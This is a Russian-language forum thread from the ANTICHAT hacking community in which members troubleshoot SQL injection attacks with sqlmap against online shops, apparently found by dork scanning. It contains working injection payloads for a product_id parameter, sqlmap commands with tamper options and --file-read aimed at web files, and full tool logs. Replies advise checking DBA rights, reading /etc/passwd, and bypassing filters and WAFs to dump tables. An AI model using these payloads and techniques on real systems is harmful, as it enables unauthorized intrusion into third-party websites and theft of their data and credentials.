ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
18.07.2018, 19:23
|
|
Новичок
Регистрация: 08.04.2007
Сообщений: 7
Провел на форуме:
20649
Репутация:
0
|
|
кстати, а скорость можно увеличить, помимо кол-ва потоков (--threads 10) и так максимально стоит.
Уж очень долго получаю список таблиц. Боюсь данные буду получать несколько часов
|
|
|
19.07.2018, 11:36
|
|
Новичок
Регистрация: 08.04.2007
Сообщений: 7
Провел на форуме:
20649
Репутация:
0
|
|
простите за столь глупые вопросы
в итоге найдено
Код:
Parameter: product_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: route=product/product&path=1&product_id=1 AND 9533=9533
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: route=product/product&path=1&product_id=1 OR SLEEP(10)
Пытаюсь получить файл.
Код:
sqlmap -u "https://site/index.php?route=product/product&path=1&product_id=1" -p product_id --file-read='/var/www/site/robots.txt' --time-sec 10 --tamper=between
Использую tamper=between
Пробую прочитать через --file-read
.SpoilerTarget" type="button">Spoiler: log
[03:13:37] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[03:13:37] [INFO] retrieved:
[03:13:45] [WARNING] reflective value(s) found and filtering out
[03:13:47] [WARNING] time-based comparison requires larger statistical model, please wait........................ (done)
[03:14:54] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[03:15:30] [WARNING] turning off pre-connect mechanism because of connection time out(s)
[03:16:32] [ERROR] invalid character detected. retrying..
[03:19:06] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[03:19:06] [INFO] fetched data logged to text files under '/root/.sqlmap/output/site'
Файл не сохраняется, если добавить --hex (--no-cast)
.SpoilerTarget" type="button">Spoiler: log --hex
[03:27:25] [INFO] retrieved:
[03:27:31] [WARNING] reflective value(s) found and filtering out
[03:27:52] [INFO] retrieved:
[03:27:52] [WARNING] there was a problem decoding value ' ' from expected hexadecimal form
do you want confirmation that the remote file '/var/www/site/robots.txt' has been successfully downloaded from the back-end DBMS file system? [Y/n] y
[03:29:05] [INFO] retrieved:
[03:29:05] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
files saved to [1]:
[*] /root/.sqlmap/output/site/files/_var_www_site_robots.txt (size differs from remote file)
[03:29:05] [INFO] fetched data logged to text files under '/root/.sqlmap/output/site'
и сохраняется пустой файл.
Проблема в правах или что-то с преобразованием символом нужно шаманить? Есть ли вариант здесь раскрутить на чтение файлов? |
|
|
|
19.07.2018, 11:40
|
|
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
Провел на форуме:
216062
Репутация:
231
|
|
Сообщение от mardoksp
↑
простите за столь глупые вопросы
в итоге найдено
Код:
Parameter: product_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: route=product/product&path=1&product_id=1 AND 9533=9533
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: route=product/product&path=1&product_id=1 OR SLEEP(10)
Пытаюсь получить файл.
Код:
sqlmap -u "https://site/index.php?route=product/product&path=1&product_id=1" -p product_id --file-read='/var/www/site/robots.txt' --time-sec 10 --tamper=between
Использую tamper=between
Пробую прочитать через --file-read
Spoiler: log
[03:13:37] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[03:13:37] [INFO] retrieved:
[03:13:45] [WARNING] reflective value(s) found and filtering out
[03:13:47] [WARNING] time-based comparison requires larger statistical model, please wait........................ (done)
[03:14:54] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[03:15:30] [WARNING] turning off pre-connect mechanism because of connection time out(s)
[03:16:32] [ERROR] invalid character detected. retrying..
[03:19:06] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[03:19:06] [INFO] fetched data logged to text files under '/root/.sqlmap/output/site'
Файл не сохраняется, если добавить --hex (--no-cast)
Spoiler: log --hex
[03:27:25] [INFO] retrieved:
[03:27:31] [WARNING] reflective value(s) found and filtering out
[03:27:52] [INFO] retrieved:
[03:27:52] [WARNING] there was a problem decoding value ' ' from expected hexadecimal form
do you want confirmation that the remote file '/var/www/site/robots.txt' has been successfully downloaded from the back-end DBMS file system? [Y/n] y
[03:29:05] [INFO] retrieved:
[03:29:05] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
files saved to [1]:[*] /root/.sqlmap/output/site/files/_var_www_site_robots.txt (size differs from remote file)
[03:29:05] [INFO] fetched data logged to text files under '/root/.sqlmap/output/site'
и сохраняется пустой файл.
Проблема в правах или что-то с преобразованием символом нужно шаманить? Есть ли вариант здесь раскрутить на чтение файлов?
Привет, проверь права --is-dba если тру ,то дальше думать будем. И прочитать попробуй /etc/passwd
|
|
|
|
19.07.2018, 12:04
|
|
Новичок
Регистрация: 08.04.2007
Сообщений: 7
Провел на форуме:
20649
Репутация:
0
|
|
Сообщение от grimnir
↑
Привет, проверь права --is-dba если тру ,то дальше думать будем. И прочитать попробуй /etc/passwd
False, даже не могу прочитать хэш пароля.
/etc/passwd аналогично не читает.
Запросы из бд отрабатывают, но вот бы исходники сайта еще просмотреть.
|
|
|
|
20.07.2018, 04:26
|
|
Познающий
Регистрация: 24.07.2017
Сообщений: 32
Провел на форуме:
8978
Репутация:
0
|
|
Здравствуйте. Сколько не сканировал сайты по доркам, (качество сайтов, определенно не лучшее) - никогда не попадалось is-dba=true, это нормально?
|
|
|
|
21.07.2018, 12:57
|
|
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
Провел на форуме:
216062
Репутация:
231
|
|
|
|
|
|
21.07.2018, 13:53
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937
Репутация:
0
|
|
Сообщение от GoodBoy
↑
Здравствуйте. Сколько не сканировал сайты по доркам, (качество сайтов, определенно не лучшее) - никогда не попадалось is-dba=true, это нормально?
Даже наличие прав, не всегда панацея, сейчас повсеместно включен secure-file-priv
https://dev.mysql.com/doc/refman/5.7...cure-file-priv
|
|
|
|
21.07.2018, 15:22
|
|
Познающий
Регистрация: 24.07.2017
Сообщений: 32
Провел на форуме:
8978
Репутация:
0
|
|
Теперь я понял, какие сайты нужны)
.SpoilerTarget" type="button">Spoiler
|
|
|
|
26.07.2018, 01:01
|
|
Познающий
Регистрация: 19.07.2011
Сообщений: 94
Провел на форуме:
25673
Репутация:
3
|
|
Нашел бажный скрипт , который стоит на нескольких сайтах . Sqlmap почти нормально читает через сиквел . Почти потому , что скрипт или сервер заменяет символ нижнего подчеркивания на запятую или дефис . При этом я могу читать имена баз , таблиц и чаще всего столбцы . Но не могу дампить .
--hex вроде бы решает проблему , но данные все равно не дампятся . Tamper не помогает .
Как я понял из ответов curl нижнее подчеркивание и все до него вырезается из имени таблицы при запросе . Таблица вида site_users в select запросе превращается в просто users .
Но при этом всем мне удалось все же найти один сайт где с --hex нужные таблицы нормально читаются :\
Хочется понять откуда у этого растут ноги . Это сам скрипт творит , или фаер , или может модуль апача так извращается ?
Ну и реально ли как-то заэкранировать нижнее подчеркивание в запросе .
|
|
|
|
01.08.2018, 03:30
|
|
Новичок
Регистрация: 10.02.2018
Сообщений: 10
Провел на форуме:
2613
Репутация:
1
|
|
надо чекнуть что фильтрует и обойти для начала) попробуй обычно если норм составишь запрос за раз --sql-query норм вывоит
бывают такие заморочки от того что можно указывать части запроса отдельно в специальных переменных до просто обычных глюков скульмапчика с кучей запросов или банальная ошибка синтаксиса но если возможность вывести колонки в работе с вафом можно фазить все слова символы в разные кодировк смешаны с заменой в тампере зависит какая бд? и очень важно не стрессить себя и свою плату особенно с большим количеством блайнд запросов что бы там не сбилось нече --no-cast
стукни чекну)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
